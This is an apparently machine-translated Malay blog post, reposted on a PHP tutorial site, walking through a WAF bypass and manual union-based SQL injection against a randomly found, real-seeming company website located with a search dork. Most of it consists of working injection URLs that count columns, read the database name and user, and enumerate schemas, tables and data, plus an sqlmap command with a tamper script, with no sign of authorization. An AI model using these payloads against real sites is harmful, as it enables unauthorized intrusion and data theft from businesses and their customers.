Rumah > Operasi dan penyelenggaraan > Keselamatan > Bagaimana untuk menjalankan analisis untuk memintas WTS-WAF

Bagaimana untuk menjalankan analisis untuk memintas WTS-WAF

王林
Lepaskan: 2023-05-13 09:40:12
ke hadapan
2010 orang telah melayarinya


0x01 Mencari sasaran

inurl:.php?id= intext:电器
Salin selepas log masuk

Saya menjumpai tapak web syarikat perkakas elektrik sambil lewa dan mendapati ada waf

Bagaimana untuk menjalankan analisis untuk memintas WTS-WAF

Bagaimana untuk menjalankan analisis untuk memintas WTS-WAF

Ini belum diatur lagi (saya jumpa beberapa maklumat, nampaknya sekadar menambah tanda sebaliknya ruang sudah memadai, cuba terus)

0x02 Operasi

Bagaimana untuk menjalankan analisis untuk memintas WTS-WAF

Didapati tiada pemintasan waf

Maklumat juga. berkata bahawa alat

sqlmap.py -u http://*/*.php?id=29 --tables --tamper space2plus.py
Salin selepas log masuk

yang saya cuba dan mendapati ia tidak boleh dimulakan

Itu sahaja...

Bagaimana untuk menjalankan analisis untuk memintas WTS-WAF

0x03. Nota tangan

http://*/*.php?id=1+and+1=1  #回显正常
http://*/*.php?id=1+and+1=2  #回显错误
说明存在注入

http://*/*.php?id=1+order+by+15  #15回显错误
http://*/*.php?id=1+order+by+14  #14回显正常
说明有14个字段

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14  #-1让它错误然后执行后面
Salin selepas log masuk

Bagaimana untuk menjalankan analisis untuk memintas WTS-WAF

Ia bergema ke-2 dan ke-8

http://*/*.php?id=-1+union+select+1,database(),3,4,5,6,7,user(),9,10,11,12,13,14  #查询当前数据库信息和当前用户
一些常见的函数
version()  #显示数据库当前版本
database() / schema()  #显示当前数据库名
user() / system_user() / session_user() / current_user() / current_user()  #显示当前用户名称
charset(str)  #返回字符串str的字符集
collation(str)  #返回字符串str的字符排列方式
Salin selepas log masuk

0x04. Semak data

Letup pangkalan data

http://*/*.php?id=-1+union+select+1,group_concat(schema_name),3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1
Salin selepas log masuk

Bagaimana untuk menjalankan analisis untuk memintas WTS-WAF

它不能group_concat,那我就一个一个查了!
http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1 #从1开始取一个
http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+1,1  #从2开始取一个
Salin selepas log masuk

Jadual data letupan

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1
Salin selepas log masuk

Bagaimana untuk menjalankan analisis untuk memintas WTS-WAF

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1
Salin selepas log masuk

Data meletup

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,字段名,9,10,11,12,13,14+表名+limit+0,1
Salin selepas log masuk

Ringkasan:

1 Jika alat tidak boleh dijalankan, anda hanya boleh menggunakannya dengan tangan Nota

2

Atas ialah kandungan terperinci Bagaimana untuk menjalankan analisis untuk memintas WTS-WAF. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Label berkaitan:
sumber:yisu.com
Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn
Tutorial Popular
Lagi>
Muat turun terkini
Lagi>
kesan web
Kod sumber laman web
Bahan laman web
Templat hujung hadapan